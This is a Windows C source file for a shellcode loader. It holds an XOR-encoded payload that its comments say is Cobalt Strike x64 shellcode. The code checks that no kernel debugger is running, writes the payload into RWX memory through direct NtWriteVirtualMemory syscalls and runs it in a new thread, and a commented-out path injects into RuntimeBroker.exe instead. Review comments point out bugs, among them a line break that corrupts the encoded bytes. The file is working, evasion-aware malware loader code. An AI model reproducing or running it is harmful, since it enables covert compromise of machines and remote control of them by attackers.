#include <windows.h>
#include <stdio.h>
#include <tlhelp32.h>
#include "syscalls.h"
#include "connector.h"
#include "kernelmode_antidbg.h"
#define shellcode_size 894

BOOL anti_dbg();
void RunTheShellcode();

/*
 * Entry point.
 *
 * Consults anti_dbg() once: when it reports a clean state the embedded
 * payload is started via RunTheShellcode(); otherwise a message is printed
 * and the process exits with status 0. argc/argv are not used.
 */
int main(int argc, char* argv[]) {

    /*
    // hiding the console window (currently disabled)
    HWND hWnd = GetConsoleWindow();
    ShowWindow(hWnd, SW_MINIMIZE);
    ShowWindow(hWnd, SW_HIDE);
    */

    // Guard clause: anything other than an explicit "clean" verdict aborts.
    if (anti_dbg() != true) {
        printf("Exiting ... \n");
        exit(0);
    }

    printf("[MAIN] No dbg was detected running shellcode ... \n");
    RunTheShellcode();

    return 0;
}


/*
 * Decode the embedded payload and execute it in a new thread.
 *
 * Steps, as written:
 *   1. Open a handle to the target process. process_id is currently
 *      GetCurrentProcessId(), i.e. the payload is written into THIS process;
 *      the commented-out find() path targets another process.
 *   2. NtAllocateVirtualMemory: one RWX region of shellcode_size bytes.
 *   3. XOR-decode the literal one byte at a time and write each byte with a
 *      separate NtWriteVirtualMemory call.
 *   4. Sleep for 15 s (5 x 3000 ms), then NtCreateThreadEx at the region's
 *      base address and WaitForSingleObject on the thread until it returns.
 *
 * NOTE(review) - correctness issues visible in this function, not fixed here:
 *   - The write loop runs `i <= sizeof(shellcode)`. sizeof() already counts
 *     the string's NUL terminator, so the loop visits sizeof+1 indexes: the
 *     terminator is decoded and written, and index sizeof(shellcode) is an
 *     out-of-bounds read of the array (undefined behaviour).
 *   - The region is sized by the shellcode_size macro (894) while the loop is
 *     bounded by sizeof(shellcode); these are two independent sources of truth
 *     for the payload length and nothing checks that they agree.
 *   - The Status of NtAllocateVirtualMemory is ignored (only base_address is
 *     tested); the Status of NtCreateThreadEx is ignored too, so if it fails
 *     `thread` stays NULL, WaitForSingleObject(NULL) fails immediately and
 *     "[+] The thread finished!" is printed anyway.
 *   - Neither the process handle nor the thread handle is ever closed.
 *   - threadId is declared but never used.
 */
void RunTheShellcode() {

    
    //the x64 shellcode from cobalt strike encoded by our encoder
    // NOTE(review): the literal below ends line 1 with a bare backslash, which the
    // preprocessor splices with the next line into "\x8x2a". A hex escape stops at
    // the first non-hex character, so that reads as byte 0x08 followed by the
    // literal characters 'x','2','a' - presumably a wrapped "\x8\x2a". Verify
    // against the encoder's output before relying on the decoded bytes.
    const char shellcode[] = "\xb9\xd\xc6\xa1\xb5\xad\x8d\x45\x45\x45\x4\x14\x4\x15\x17\x14\x13\xd\x74\x97\x20\xd\xce\x17\x25\xd\xce\x17\x5d\xd\xce\x17\x65\xd\xce\x37\x15\xd\x4a\xf2\xf\xf\x8\x74\x8c\xd\x74\x85\xe9\x79\x24\x39\x47\x69\x65\x4\x84\x8c\x48\x4\x44\x84\xa7\xa8\x17\x4\x14\xd\xce\x17\x65\xce\x7\x79\xd\x44\x95\x23\xc4\x3d\x5d\x4e\x47\x30\x37\xce\xc5\xcd\x45\x45\x45\xd\xc0\x85\x31\x22\xd\x44\x95\x15\xce\xd\x5d\x1\xce\x5\x65\xc\x44\x95\xa6\x13\xd\xba\x8c\x4\xce\x71\xcd\xd\x44\x93\x8\x74\x8c\xd\x74\x85\xe9\x4\x84\x8c\x48\x4\x44\x84\x7d\xa5\x30\xb4\x9\x46\x9\x61\x4d\x0\x7c\x94\x30\x9d\x1d\x1\xce\x5\x61\xc\x44\x95\x23\x4\xce\x49\xd\x1\xce\x5\x59\xc\x44\x95\x4\xce\x41\xcd\xd\x44\x95\x4\x1d\x4\x1d\x1b\x1c\x1f\x4\x1d\x4\x1c\x4\x1f\xd\xc6\xa9\x65\x4\x17\xba\xa5\x1d\x4\x1c\x1f\xd\xce\x57\xac\xa\xba\xba\xba\x18\x2f\x45\xc\xfb\x32\x2c\x2b\x2c\x2b\x20\x31\x45\x4\x13\xc\xcc\xa3\x9\xcc\xb4\x4\xff\x9\x32\x63\x42\xba\x90\xd\x74\x8c\xd\x74\x97\x8\x74\x85\x8\x74\x8c\x4\x15\x4\x15\x4\xff\x7f\x13\x3c\xe2\xba\x90\xac\xd6\x45\x45\x45\x1f\xd\xcc\x84\x4\xfd\x1d\x45\x45\x45\x8\x74\x8c\x4\x14\x4\x14\x2f\x46\x4\x14\x4\xff\x12\xcc\xda\x83\xba\x90\xae\x3c\x1e\xd\xcc\x84\xd\x74\x97\xc\xcc\x9d\x8\x74\x8c\x17\x2d\x45\x77\x85\xc1\x17\x17\x4\xff\xae\x10\x6b\x7e\xba\x90\xd\xcc\x83\xd\xc6\x86\x15\x2f\x4f\x1a\xd\xcc\xb4\xff\x5a\x45\x45\x45\x2f\x45\x2d\xc5\x76\x45\x45\xc\xcc\xa5\x4\xfc\x41\x45\x45\x45\x4\xff\x30\x3\xdb\xc3\xba\x90\xd\xcc\xb4\xd\xcc\x9f\xc\x82\x85\xba\xba\xba\xba\x8\x74\x8c\x17\x17\x4\xff\x68\x43\x5d\x3e\xba\x90\xc0\x85\x4a\xc0\xd8\x44\x45\x45\xd\xba\x8a\x4a\xc1\xc9\x44\x45\x45\xae\xf6\xac\xa1\x44\x45\x45\xad\xc7\xba\xba\xba\x6a\x6\x36\x31\x76\x45\xf1\x50\xe0\x74\x4\x90\x5e\x8f\xb7\x54\x6e\xa8\xeb\x6e\xaa\xe9\x50\x0\x88\xff\xd5\xe8\x6\x38\xa0\x18\x8e\x25\x90\xd5\x33\xbd\xc4\x2a\x65\x84\xcd\x44\x73\x44\x9\x4\xf6\xb7\xe4\xe6\xb7\x98\x30\x78\x86\x74\x53\xf\x9c\x91\xee\xe0\x84\x36\xa7\xf6\x39\x6c\xe0\x64\xd6\x3c\xbe\x3c\xd2\x4\x44\x45\x10\x36\x20\x37\x68\x4\x22\x20\x2b\x31\x7f\x65\x8\
x2a\x3f\x2c\x29\x29\x24\x6a\x70\x6b\x75\x65\x6d\x12\x2c\x2b\x21\x2a\x32\x36\x65\xb\x11\x65\x73\x6b\x74\x7e\x65\x12\xa\x12\x73\x71\x7e\x65\x11\x37\x2c\x21\x20\x2b\x31\x6a\x72\x6b\x75\x7e\x65\x37\x33\x7f\x74\x74\x6b\x75\x6c\x65\x29\x2c\x2e\x20\x65\x2\x20\x26\x2e\x2a\x48\x4f\x45\xb1\x85\x29\xe7\xd9\xe5\x6b\xbf\x28\x1d\x7e\x9f\x73\x40\x59\x75\x23\x57\xfd\x2c\x12\xb5\xd6\xa\xce\x3b\xdf\xbd\x31\x54\x30\x9a\xe4\xf3\x82\xa3\x3f\x1c\x36\x51\xee\x5a\x9f\x80\x15\x9\x3a\xeb\x81\xca\xca\x86\x6e\xdb\x28\x19\xc4\xab\x4c\xf7\xbc\x6e\x6c\xc5\x3a\xbe\xb3\x74\xee\x95\xf9\xb4\x86\x8a\x21\x6c\x25\x41\xb8\x42\xd3\x24\xb8\x23\x8a\x19\x49\xb6\x99\x3e\xa2\xf6\xb7\x28\x2a\xa0\x85\xf9\x98\xb5\x96\x21\x4c\x3d\xe4\x85\x4a\xcd\xbe\xab\xe0\xda\x8c\xfa\x26\xf1\xe2\xac\x44\x47\x95\x63\x5c\x89\x77\xaa\x5b\xcb\xc4\xca\x1e\x89\x69\xc2\x21\x0\x71\xc\xc\x3f\x52\x33\x5d\x65\xfd\x87\x67\x28\x64\xd6\x81\x9f\x29\xb9\x67\x1f\x2e\x14\xab\x92\xb0\xd7\x9a\x74\x58\xf7\x2b\xe9\xb4\x93\x18\x92\x59\x4e\x42\xd6\x3c\xce\x8e\xf6\x30\x9f\xab\x2f\x54\x9c\xad\x12\xf7\xbb\x7b\x11\x2f\x28\x78\xe7\xf4\x5b\x9b\x4b\x83\x70\x1c\xc1\x21\xe6\x81\x6\x50\xa1\xe2\xb1\x95\xc0\x53\x4e\x1a\xc4\xa5\xe1\x45\x4\xfb\xb5\xf0\xe7\x13\xba\x90\xd\x74\x8c\xff\x45\x45\x5\x45\x4\xfd\x45\x55\x45\x45\x4\xfc\x5\x45\x45\x45\x4\xff\x1d\xe1\x16\xa0\xba\x90\xd\xd6\x16\x16\xd\xcc\xa2\xd\xcc\xb4\xd\xcc\x9f\x4\xfd\x45\x65\x45\x45\xc\xcc\xbc\x4\xff\x57\xd3\xcc\xa7\xba\x90\xd\xc6\x81\x65\xc0\x85\x31\xf3\x23\xce\x42\xd\x44\x86\xc0\x85\x30\x92\x1d\x1d\x1d\xd\x40\x45\x45\x45\x45\x15\x86\xad\x3a\xb8\xba\xba\x74\x7c\x77\x6b\x74\x73\x7d\x6b\x74\x73\x6b\x74\x75\x72\x45\x5c\x2c\xe5\xc8";
    //if u want to inject to 'RuntimeBroker.exe' use :
    //int process_id = find();
    // Self-injection: the target is the running process itself.
    int process_id = GetCurrentProcessId();

    // NOTE(review): this handle is never closed on any path below.
    HANDLE process = OpenProcess(PROCESS_ALL_ACCESS, FALSE, process_id);

    if (process) {
        printf("[+] process opened - Handle value is %p\n", process);

        NTSTATUS Status;
        // Region size comes from the macro, not from sizeof(shellcode).
        SIZE_T Size = shellcode_size;
        PVOID base_address = NULL;
        PCHAR StartOfBuffer;

        // Single RWX allocation; Status is not checked, only base_address below.
        Status = NtAllocateVirtualMemory(process, &base_address, 0, &Size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);

        printf("[+] Memory Allocated\n");

        if (base_address) {
            printf("[+] Allocated based address is 0x%p\n", base_address);

            // n counts bytes actually written; it only advances on a successful write,
            // so a failed write shifts every later byte one position back.
            int n = 0;

            // NOTE(review): `<=` visits index sizeof(shellcode), one past the end of
            // the array (out-of-bounds read); the NUL terminator is also decoded and written.
            for (int i = 0; i <= sizeof(shellcode); i++) {

                // Decode shellcode opcode, based on the settings of the encoder :
                // The nine XOR constants are all compile-time, so this is a single-byte
                // XOR with the folded key (0x7a^0xf7^0x32^0x05^0xd8^0xa3^0xc7^0x52^0x11 == 0x45).
                char DecodedOpCode = shellcode[i] ^ 0x7a ^ 0xf7 ^ 0x32 ^ 0x05 ^ 0xd8 ^ 0xa3 ^ 0xc7 ^ 0x52 ^ 0x11;
                
          
                // One syscall per byte; success is NTSTATUS 0.
                Status = NtWriteVirtualMemory(process, LPVOID((ULONG_PTR)base_address + n), &DecodedOpCode, 0x1, NULL);
                if (!Status){
                    // NOTE(review): DecodedOpCode is a (signed) char promoted to int, so values
                    // >= 0x80 print sign-extended (e.g. 0xFFFFFFB9) under %X.
                    printf("[+] Byte 0x%X wrote sucessfully! at 0x%p\n", DecodedOpCode, LPVOID((ULONG_PTR)base_address + n));
                    n++;
                }

            }

            // Unused.
            DWORD threadId = 0;

            // 5 x 3000 ms = 15 s pause before the thread is started.
            for (int i = 0; i < 5; i++)
            {
                Sleep(3000);
            }
            
            printf("[+] Running the thread...\n");
            
            // NOTE(review): Status is ignored; on failure `thread` stays NULL and the
            // wait below fails immediately while the success message is still printed.
            // The thread handle is never closed.
            HANDLE thread = NULL;
            Status = NtCreateThreadEx(
                &thread,
                THREAD_ALL_ACCESS,
                NULL,
                process,
                (LPTHREAD_START_ROUTINE)base_address,
                NULL,
                NULL,
                NULL,
                NULL,
                NULL,
                NULL
            );
       

            // Blocks until the payload thread exits (or immediately if thread is NULL).
            WaitForSingleObject(HANDLE(thread), INFINITE);   
            printf("[+] The thread finished!\n");
        }
        else {
            printf("[+] Unable to allocate memory ..\n");
        }
    }
    else {
        printf("[-] Enable to retrieve process handle\n");
    }
}


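/*
 * Gate execution on the kernel-debugger state reported by
 * is_kernelmode_dbg_enabled() (declared in kernelmode_antidbg.h).
 *
 * Returns true only for KDB_DISABLED. KDB_LOCAL_ENABLED, KDB_REMOTE_ENABLED
 * and any unrecognised value (treated as a failed query) return false.
 *
 * Fix: the helper is queried exactly once and the result cached. The original
 * called it again in every else-if branch, so a value that changed between
 * calls could skip all three known states and land in the "unknown" branch,
 * and the branch taken did not necessarily match the value first observed.
 */
BOOL anti_dbg() {

    // Single observation; every comparison below uses this same value.
    const int kdb_state = is_kernelmode_dbg_enabled();

    if (kdb_state == KDB_DISABLED) {
        printf("dbg is disabled \n");
        return true;
    }
    else if (kdb_state == KDB_LOCAL_ENABLED) {
        printf("local dbg is running ...\n");
        return false;
    }
    else if (kdb_state == KDB_REMOTE_ENABLED) {
        printf("remote dbg is running ...\n");
        return false;
    }
    else {
        // Any value outside the three known states is treated as a failure of the query.
        printf("Unkown state , possibly is_kernelmode_dbg_enabled faild ... \n ");
        return false;
    }

}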